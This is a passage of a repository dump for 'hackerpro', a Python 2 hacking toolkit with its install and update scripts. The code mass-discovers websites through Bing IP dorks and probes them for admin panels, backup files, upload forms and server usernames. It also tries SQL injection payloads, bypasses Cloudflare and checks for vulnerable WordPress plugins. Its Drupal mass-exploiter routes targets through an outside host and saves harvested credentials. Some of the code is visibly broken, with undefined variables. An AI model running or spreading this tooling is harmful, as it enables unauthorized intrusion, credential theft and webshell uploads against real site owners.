findwebs = re.findall('<h2><a href="(.*?)"', readbing)
for i in range(len(findwebs)):
wpnoclean = findwebs[i]
findwp = re.findall('(.*?)\?page_id=', wpnoclean)
lista.extend(findwp)
page += 50
except:
pass
lista = unique(lista)
clearScr()
print '[*] Found ', len(lista), ' Wordpress Website\n'
for site in lista:
print site
def getJoomla(self):
"""
get all joomla websites using
bing search the attacker may bruteforce
or scan them
"""
lista = []
page = 1
while page <= 101:
bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + \
"+index.php?option=com&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('<h2><a href="(.*?)"', readbing)
for i in range(len(findwebs)):
jmnoclean = findwebs[i]
findjm = re.findall('(.*?)index.php', jmnoclean)
lista.extend(findjm)
page += 50
lista = unique(lista)
clearScr()
print '[*] Found ', len(lista), ' Joomla Website\n'
for site in lista:
print site
############################
# find admin panels
def findPanels(self):
"""
find panels from grabbed websites
the attacker may do a lot of vulnerabilty
tests on the admin area
"""
print "[~] Finding admin panels"
adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/',
'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
clearScr()
for site in self.sites:
for admin in adminList:
try:
if urllib.urlopen(site + admin).getcode() == 200:
print " [*] Found admin panel -> ", site + admin
except IOError:
pass
############################
# find ZIP files
def findZip(self):
"""
find zip files from grabbed websites
it may contain useful informations
"""
zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar',
'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
clearScr()
print "[~] Finding zip file"
for site in self.sites:
for zip1 in zipList:
try:
if urllib.urlopen(site + zip1).getcode() == 200:
print " [*] Found zip file -> ", site + zip1
except IOError:
pass
def findUp(self):
"""
find upload forms from grabbed
websites the attacker may succeed to
upload malicious files like webshells
"""
upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php', 'blog/up.php', 'upload.php',
'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
clearScr()
print "[~] Finding Upload"
for site in self.sites:
for up in upList:
try:
if (urllib.urlopen(site + up).getcode() == 200):
html = urllib.urlopen(site + up).readlines()
for line in html:
if re.findall('type=file', line):
print " [*] Found upload -> ", site + up
except IOError:
pass
def getUsers(self):
"""
get server users using a method found by
iranian hackers , the attacker may
do a bruteforce attack on CPanel, ssh, ftp or
even mysql if it supports remote login
(you can use medusa or hydra)
"""
clearScr()
print "[~] Grabbing Users"
userslist = []
for site1 in self.sites:
try:
site = site1
site = site.replace('http://www.', '')
site = site.replace('http://', '')
site = site.replace('.', '')
if '-' in site:
site = site.replace('-', '')
site = site.replace('/', '')
while len(site) > 2:
resp = urllib2.urlopen(
site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
if 'invalid username' not in resp.lower():
print '\t [*] Found -> ', site
userslist.append(site)
break
else:
print site
site = site[:-1]
except:
pass
clearScr()
for user in userslist:
print user
def cloudflareBypasser(self):
"""
trys to bypass cloudflare i already wrote
in my blog how it works, i learned this
method from a guy in madleets
"""
clearScr()
print "[~] Bypassing cloudflare"
subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
for site in self.sites:
site.replace('http://', '')
site.replace('/', '')
try:
ip = socket.gethostbyname(site)
except socket.error:
pass
for sub in subdoms:
doo = sub + '.' + site
print ' [~] Trying -> ', doo
try:
ddd = socket.gethostbyname(doo)
if ddd != ip:
print ' [*] Cloudflare bypassed -> ', ddd
break
except socket.error:
pass
def getServerBanner(self):
"""
simply gets the server banner
the attacker may benefit from it
like getting the server side software
"""
clearScr()
try:
s = 'http://' + self.serverip
httpresponse = urllib.urlopen(s)
print ' [*] Server header -> ', httpresponse.headers.getheader('server')
except:
pass
def grabSqli(self):
"""
just grabs all websites in server with php?id= dork
for scanning for error based sql injection
"""
page = 1
lista = []
while page <= 101:
try:
bing = "http://www.bing.com/search?q=ip%3A" + \
self.serverip + "+php?id=&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('<h2><a href="(.*?)"', readbing)
for i in range(len(findwebs)):
x = findwebs[i]
lista.append(x)
except:
pass
page += 50
lista = unique(lista)
self.checkSqli(lista)
def checkSqli(self, s):
"""
checks for error based sql injection,
most of the codes here are from webpwn3r
project the one who has found an lfi in
yahoo as i remember, you can find a separate
tool in my blog
"""
clearScr()
print "[~] Checking SQL injection"
payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><",
"3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
check = re.compile(
"Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
for url in s:
try:
for param in url.split('?')[1].split('&'):
for payload in payloads:
power = url.replace(param, param + payload.strip())
html = urllib2.urlopen(power).readlines()
for line in html:
checker = re.findall(check, line)
if len(checker) != 0:
print ' [*] SQLi found -> ', power
except:
pass
def portScanner(self, mode, ran):
"""
simple port scanner works with range of ports
or with common ports (al-swisre idea)
"""
clearScr()
print "[~] Scanning Ports"
def do_it(ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock = sock.connect_ex((ip, port))
if sock == 0:
print " [*] Port %i is open" % port
if mode == 1:
a = ran.split('-')
start = int(a[0])
end = int(a[1])
for i in range(start, end):
do_it(self.serverip, i)
elif mode == 2:
for port in [80, 21, 22, 2082, 25, 53, 110, 443, 143]:
do_it(self.serverip, port)
############################
minu = '''
\t 1: Drupal Bing Exploiter
\t 2: Get Drupal Websites
\t 3: Drupal Mass Exploiter
\t 99: Back To Main Menu
'''
def drupal():
'''Drupal Exploit Binger All Websites Of server '''
ip = raw_input('1- IP : ')
page = 1
while page <= 50:
url = "http://www.bing.com/search?q=ip%3A" + ip + "&go=Valider&qs=n&form=QBRE&pq=ip%3A" + \
ip + "&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first=" + \
str(page)
req = urllib2.Request(url)
opreq = urllib2.urlopen(req).read()
findurl = re.findall(
'<div class="b_title"><h2><a href="(.*?)" h=', opreq)
page += 1
for url in findurl:
try:
urlpa = urlparse(url)
site = urlpa.netloc
print "[+] Testing At " + site
resp = urllib2.urlopen(
'http://crig-alda.ro/wp-admin/css/index2.php?url=' + site + '&submit=submit')
read = resp.read()
if "User : HolaKo" in read:
print "Exploit found =>" + site
print "user:HolaKo\npass:admin"
a = open('up.txt', 'a')
a.write(site + '\n')
a.write("user:" + user + "\npass:" + pwd + "\n")
else:
print "[-] Expl Not Found :( "
except Exception as ex:
print ex
sys.exit(0)
# Drupal Server ExtraCtor
def getdrupal():
ip = raw_input('Enter The Ip : ')
page = 1
sites = list()
while page <= 50:
url = "http://www.bing.com/search?q=ip%3A" + ip + \
"+node&go=Valider&qs=ds&form=QBRE&first=" + str(page)
req = urllib2.Request(url)
opreq = urllib2.urlopen(req).read()
findurl = re.findall(
'<div class="b_title"><h2><a href="(.*?)" h=', opreq)
page += 1
for url in findurl:
split = urlparse(url)
site = split.netloc
if site not in sites:
print site
sites.append(site)
# Drupal Mass List Exploiter
def drupallist():
listop = raw_input("Enter The list Txt ~# ")
fileopen = open(listop, 'r')
content = fileopen.readlines()
for i in content:
url = i.strip()
try:
openurl = urllib2.urlopen(
'http://crig-alda.ro/wp-admin/css/index2.php?url=' + url + '&submit=submit')
readcontent = openurl.read()
if "Success" in readcontent:
print "[+]Success =>" + url
print "[-]username:HolaKo\n[-]password:admin"
save = open('drupal.txt', 'a')
save.write(
url + "\n" + "[-]username:HolaKo\n[-]password:admin\n")
else:
print i + "=> exploit not found "
except Exception as ex:
print ex
def maine():
print minu
choose = raw_input("choose a number : ")
while True:
if choose == "1":
drupal()
if choose == "2":
getdrupal()
if choose == "3":
drupallist()
if choose == "4":
about()
if choose == "99":
menu()
con = raw_input('Continue [Y/n] -> ')
if con[0].upper() == 'N':
exit()
if con[0].upper() == 'Y':
maine()
def unique(seq):
seen = set()
return [seen.add(x) or x for x in seq if x not in seen]
def bing_all_grabber(s):
lista = []
page = 1
while page <= 101:
try:
bing = "http://www.bing.com/search?q=ip%3A" + \
s + "+&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('<h2><a href="(.*?)"', readbing)
for i in range(len(findwebs)):
allnoclean = findwebs[i]
findall1 = re.findall('http://(.*?)/', allnoclean)
for idx, item in enumerate(findall1):
if 'www' not in item:
findall1[idx] = 'http://www.' + item + '/'
else:
findall1[idx] = 'http://' + item + '/'
lista.extend(findall1)
page += 50
except urllib2.URLError:
pass
final = unique(lista)
return final
def check_wordpress(sites):
wp = []
for site in sites:
try:
if urllib2.urlopen(site + 'wp-login.php').getcode() == 200:
wp.append(site)
except:
pass
return wp
def check_joomla(sites):
joomla = []
for site in sites:
try:
if urllib2.urlopen(site + 'administrator').getcode() == 200:
joomla.append(site)
except:
pass
return joomla
def wppjmla():
ipp = raw_input('Enter Target IP : ')
sites = bing_all_grabber(str(ipp))
wordpress = check_wordpress(sites)
joomla = check_joomla(sites)
for ss in wordpress:
print ss
print '[+] Found ! ', len(wordpress), ' Wordpress Websites'
print '-' * 30 + '\n'
for ss in joomla:
print ss
print '[+] Found ! ', len(joomla), ' Joomla Websites'
print '\n'
# initialise the fscan function
class dzz():
def __init__(self):
clearScr()
aaa = raw_input("Target IP : ")
Fscan(aaa)
############################
class bcolors:
HEADER = ''
OKBLUE = ''
OKGREEN = ''
WARNING = ''
FAIL = ''
ENDC = ''
CYAN = ''
class colors():
PURPLE = ''
CYAN = ''
DARKCYAN = ''
BLUE = ''
GREEN = ''
YELLOW = ''
RED = ''
BOLD = ''
ENDC = ''
def grabsqli(ip):
try:
print bcolors.OKBLUE + "Check_Uplaod... "
print '\n'
page = 1
while page <= 21:
bing = "http://www.bing.com/search?q=ip%3A" + \
ip + "+upload&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('<h2><a href="(.*?)"', readbing)
sites = findwebs
for i in sites:
try:
response = urllib2.urlopen(i).read()
checksqli(i)
except urllib2.HTTPError, e:
str(sites).strip(i)
page = page + 10
except:
pass
def checksqli(sqli):
responsetwo = urllib2.urlopen(sqli).read()
find = re.findall('type="file"', responsetwo)
if find:
print(" Found ==> " + sqli)
def sqlscan():
ip = raw_input('Enter IP -> ')
grabsqli(ip)
def unique(seq):
seen = set()
return [seen.add(x) or x for x in seq if x not in seen]
def bing_all_grabber(s):
lista = []
page = 1
while page <= 101:
try:
bing = "http://www.bing.com/search?q=ip%3A" + \
s + "+&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('<h2><a href="(.*?)"', readbing)
for i in range(len(findwebs)):
allnoclean = findwebs[i]
findall1 = re.findall('http://(.*?)/', allnoclean)
for idx, item in enumerate(findall1):
if 'www' not in item:
findall1[idx] = 'http://www.' + item + '/'
else:
findall1[idx] = 'http://' + item + '/'
lista.extend(findall1)
page += 50
except urllib2.URLError:
pass
final = unique(lista)
return final
def check_wordpress(sites):
wp = []
for site in sites:
try:
if urllib2.urlopen(site + 'wp-login.php').getcode() == 200:
wp.append(site)
except:
pass
return wp
def check_wpstorethemeremotefileupload(sites):
wpstorethemeremotefileupload = []
for site in sites:
try:
if urllib2.urlopen(site + 'wp-content/themes/WPStore/upload/index.php').getcode() == 200:
wpstorethemeremotefileupload.append(site)
except:
pass
return wpstorethemeremotefileupload
def check_wpcontactcreativeform(sites):
wpcontactcreativeform = []
for site in sites:
try:
if urllib2.urlopen(site + 'wp-content/plugins/sexy-contact-form/includes/fileupload/index.php').getcode() == 200:
wpcontactcreativeform.append(site)
except:
pass
return wpcontactcreativeform
def check_wplazyseoplugin(sites):
wplazyseoplugin = []
for site in sites:
try:
if urllib2.urlopen(site + 'wp-content/plugins/lazy-seo/lazyseo.php').getcode() == 200:
wplazyseoplugin.append(site)
except:
pass
return wplazyseoplugin
def check_wpeasyupload(sites):
wpeasyupload = []
for site in sites:
try:
if urllib2.urlopen(site + 'wp-content/plugins/easy-comment-uploads/upload-form.php').getcode() == 200:
wpeasyupload.append(site)
except:
pass
return wpeasyupload
def check_wpsymposium(sites):
wpsymposium = []
for site in sites:
try:
if urllib2.urlopen(site + 'wp-symposium/server/file_upload_form.php').getcode() == 200:
wpsycmium.append(site)
except:
pass
return wpsymposium
def wpminiscanner():
ip = raw_input('Enter IP : ')
sites = bing_all_grabber(str(ip))
wordpress = check_wordpress(sites)
wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites)
wpcontactcreativeform = check_wpcontactcreativeform(sites)
wplazyseoplugin = check_wplazyseoplugin(sites)
wpeasyupload = check_wpeasyupload(sites)
wpsymposium = check_wpsymposium(sites)
for ss in wordpress:
print ss
print '[*] Found, ', len(wordpress), ' wordpress sites.'
print '-' * 30 + '\n'
for ss in wpstorethemeremotefileupload:
print ss
print '[*] Found, ', len(wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.'
print '-' * 30 + '\n'
for ss in wpcontactcreativeform:
print ss
print '[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.'
print '-' * 30 + '\n'
for ss in wplazyseoplugin:
print ss
print '[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.'
print '-' * 30 + '\n'
for ss in wpeasyupload:
print ss
print '[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.'
print '-' * 30 + '\n'
for ss in wpsymposium:
print ss
print '[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.'
print '\n'
############################
if __name__ == "__main__":
try:
menu()
except KeyboardInterrupt:
print(" Finishing up...\r"),
time.sleep(0.25)
================================================
FILE: install.sh
================================================
#!/bin/bash
clear
BLACK='\e[30m'
RED='\e[31m'
GREEN='\e[32m'
YELLOW='\e[33m'
BLUE='\e[34m'
PURPLE='\e[35m'
CYAN='\e[36m'
WHITE='\e[37m'
NC='\e[0m'
echo ""
echo -e "${RED} _ _ _ _____ "
echo " | | | | | | | __ \ "
echo " | |__| | __ _ ___| | _____ _ __ | |__) | __ ___ "
echo " | __ |/ _. |/ __| |/ / _ \ |__| | ___/ |__/ _ \ "
echo " | | | | (_| | (__| ( _/ | | | | | | (_) | "
echo " |_| |_|\__,_|\___|_|\_\___|_| |_| |_| \___/ "
echo -e "${RED} ~ Tools for Hacking by Technical Dada ${NC}"
echo ""
echo -e "${YELLOW} http://technicaldada.in | https://facebook.com/technicaldada.in | https://github.com/technicaldada ${NC} "
echo ""
echo "---------------------------------------------------------------------------------------"
echo ""
echo -e "${RED}[!] This Tool Must Run As ROOT [!]${NC}"
echo ""
echo -e "${CYAN}[>] Press ENTER to Install HackerPro, CTRL+C to Abort.${NC}"
read INPUT
echo ""
if [ "$PREFIX" = "/data/data/com.termux/files/usr" ]; then
INSTALL_DIR="$PREFIX/usr/share/doc/hackerpro"
BIN_DIR="$PREFIX/usr/bin/"
pkg install -y git python2
else
INSTALL_DIR="/usr/share/doc/hackerpro"
BIN_DIR="/usr/bin/"
fi
echo "[✔] Checking directories...";
if [ -d "$INSTALL_DIR" ]; then
echo "[!] A Directory hackerpro Was Found.. Do You Want To Replace It ? [y/n]:" ;
read mama
if [ "$mama" = "y" ]; then
rm -R "$INSTALL_DIR"
else
exit
fi
fi
echo "[✔] Installing ...";
echo "";
git clone https://github.com/technicaldada/hackerpro.git "$INSTALL_DIR";
echo "#!/bin/bash
python $INSTALL_DIR/hackerpro.py" '${1+"$@"}' > hackerpro;
chmod +x hackerpro;
sudo cp hackerpro /usr/bin/;
rm hackerpro;
if [ -d "$INSTALL_DIR" ] ;
then
echo "";
echo "[✔] Successfuly Installed !!! [✔]";
echo "";
echo "[✔]========================================================================[✔]";
echo "[✔] ✔✔✔ All Is Done!! you can execute tool by typing hackerpro !! ✔✔✔ [✔]";
echo "[✔]========================================================================[✔]";
echo "";
else
echo "[✘] Installation Failed !!! [✘]";
exit
fi
================================================
FILE: update.sh
================================================
#
# _ _ _ _____
# | | | | | | | __ \
# | |__| | __ _ ___| | _____ _ __ | |__) | __ ___
# | __ |/ _` |/ __| |/ / _ \ '__| | ___/ '__/ _ \
# | | | | (_| | (__| < __/ | | | | | | (_) |
# |_| |_|\__,_|\___|_|\_\___|_| |_| |_| \___/
# Hacking Tools by-Technical Dada
clear
sudo chmod +x /etc/
clear
sudo chmod +x /usr/share/doc
clear
sudo rm -rf /usr/share/doc/hackerpro/
clear
cd /etc/
clear
sudo rm -rf /etc/technicaldada
clear
mkdir technicaldada
clear
cd technicaldada
clear
git clone https://github.com/technicaldada/hackerpro.git
clear
cd hackerpro
clear
sudo chmod +x install.sh
clear
./install.sh
clear
gitextract_3716y01f/ ├── LICENSE ├── README.md ├── hackerpro.py ├── install.sh └── update.sh
SYMBOL INDEX (99 symbols across 1 files)
FILE: hackerpro.py
function menu (line 43) | def menu():
function logo (line 82) | def logo():
function menu (line 105) | def menu():
function updatehackerpro (line 148) | def updatehackerpro():
function doork (line 157) | def doork():
function postexp (line 168) | def postexp():
function scanusers (line 187) | def scanusers():
function brutex (line 215) | def brutex():
function arachni (line 224) | def arachni():
function XSStrike (line 239) | def XSStrike():
function crips (line 246) | def crips():
function weeman (line 254) | def weeman():
function gabriel (line 266) | def gabriel():
function sitechecker (line 275) | def sitechecker():
function h2ip (line 281) | def h2ip():
function ports (line 287) | def ports():
function ifinurl (line 294) | def ifinurl():
function bsqlbf (line 308) | def bsqlbf():
function atscan (line 317) | def atscan():
function commix (line 329) | def commix():
function pixiewps (line 343) | def pixiewps():
function webhack (line 359) | def webhack():
function vbulletinrce (line 420) | def vbulletinrce():
function joomlarce (line 425) | def joomlarce():
function inurl (line 433) | def inurl():
function insinurl (line 446) | def insinurl():
function nmap (line 455) | def nmap():
function jboss (line 469) | def jboss():
function wppluginscan (line 490) | def wppluginscan():
function sqlmap (line 524) | def sqlmap():
function grabuploadedlink (line 539) | def grabuploadedlink(url):
function grabshell (line 552) | def grabshell(url):
function shelltarget (line 565) | def shelltarget():
function poet (line 573) | def poet():
function setoolkit (line 589) | def setoolkit():
function cupp (line 610) | def cupp():
function ncrack (line 627) | def ncrack():
function reaver (line 645) | def reaver():
function ssls (line 668) | def ssls():
function unique (line 685) | def unique(seq):
function bing_all_grabber (line 690) | def bing_all_grabber(s):
function check_gravityforms (line 719) | def check_gravityforms(sites):
function gravity (line 732) | def gravity():
function shellnoob (line 743) | def shellnoob():
function info (line 758) | def info():
function cmsscan (line 811) | def cmsscan():
function wpue (line 818) | def wpue():
function priv8 (line 825) | def priv8():
function androidhash (line 829) | def androidhash():
function passwd (line 837) | def passwd():
function bluepot (line 860) | def bluepot():
function fluxion (line 868) | def fluxion():
function wire (line 881) | def wire():
function exp (line 907) | def exp():
function snif (line 953) | def snif():
function cmsfew (line 982) | def cmsfew():
function smtpsend (line 990) | def smtpsend():
function pisher (line 996) | def pisher():
function unique (line 1021) | def unique(seq):
function clearScr (line 1029) | def clearScr():
class Fscan (line 1040) | class Fscan:
method __init__ (line 1041) | def __init__(self, serverip):
method getSites (line 1081) | def getSites(self, a):
method getWordpress (line 1115) | def getWordpress(self):
method getJoomla (line 1144) | def getJoomla(self):
method findPanels (line 1171) | def findPanels(self):
method findZip (line 1191) | def findZip(self):
method findUp (line 1208) | def findUp(self):
method getUsers (line 1229) | def getUsers(self):
method cloudflareBypasser (line 1267) | def cloudflareBypasser(self):
method getServerBanner (line 1294) | def getServerBanner(self):
method grabSqli (line 1308) | def grabSqli(self):
method checkSqli (line 1331) | def checkSqli(self, s):
function portScanner (line 1360) | def portScanner(self, mode, ran):
function drupal (line 1396) | def drupal():
function getdrupal (line 1438) | def getdrupal():
function drupallist (line 1462) | def drupallist():
function maine (line 1485) | def maine():
function unique (line 1508) | def unique(seq):
function bing_all_grabber (line 1513) | def bing_all_grabber(s):
function check_wordpress (line 1541) | def check_wordpress(sites):
function check_joomla (line 1553) | def check_joomla(sites):
function wppjmla (line 1565) | def wppjmla():
class dzz (line 1584) | class dzz():
method __init__ (line 1585) | def __init__(self):
class bcolors (line 1592) | class bcolors:
class colors (line 1602) | class colors():
function grabsqli (line 1614) | def grabsqli(ip):
function checksqli (line 1639) | def checksqli(sqli):
function sqlscan (line 1646) | def sqlscan():
function unique (line 1651) | def unique(seq):
function bing_all_grabber (line 1656) | def bing_all_grabber(s):
function check_wordpress (line 1684) | def check_wordpress(sites):
function check_wpstorethemeremotefileupload (line 1696) | def check_wpstorethemeremotefileupload(sites):
function check_wpcontactcreativeform (line 1708) | def check_wpcontactcreativeform(sites):
function check_wplazyseoplugin (line 1720) | def check_wplazyseoplugin(sites):
function check_wpeasyupload (line 1732) | def check_wpeasyupload(sites):
function check_wpsymposium (line 1744) | def check_wpsymposium(sites):
function wpminiscanner (line 1756) | def wpminiscanner():
Condensed preview — 5 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (65K chars).
[
{
"path": "LICENSE",
"chars": 1071,
"preview": "MIT License\n\nCopyright (c) 2018 Technical Dada\n\nPermission is hereby granted, free of charge, to any person obtaining a "
},
{
"path": "README.md",
"chars": 2992,
"preview": "[](https://github.com/technicaldada/jaykali/"
},
{
"path": "hackerpro.py",
"chars": 54769,
"preview": "#!/usr/bin/env python2.7\n#\n# \n# _ _ _ _____ \n# | | | | | | "
},
{
"path": "install.sh",
"chars": 2328,
"preview": "#!/bin/bash\nclear\n\nBLACK='\\e[30m'\nRED='\\e[31m'\nGREEN='\\e[32m'\nYELLOW='\\e[33m'\nBLUE='\\e[34m'\nPURPLE='\\e[35m'\nCYAN='\\e[36m"
},
{
"path": "update.sh",
"chars": 736,
"preview": "#\n# _ _ _ _____ \n# | | | | | | | __ \\ \n# | |__| |"
}
]
About this extraction
This page contains the full source code of the technicaldada/hackerpro GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 5 files (60.4 KB), approximately 16.2k tokens, and a symbol index with 99 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.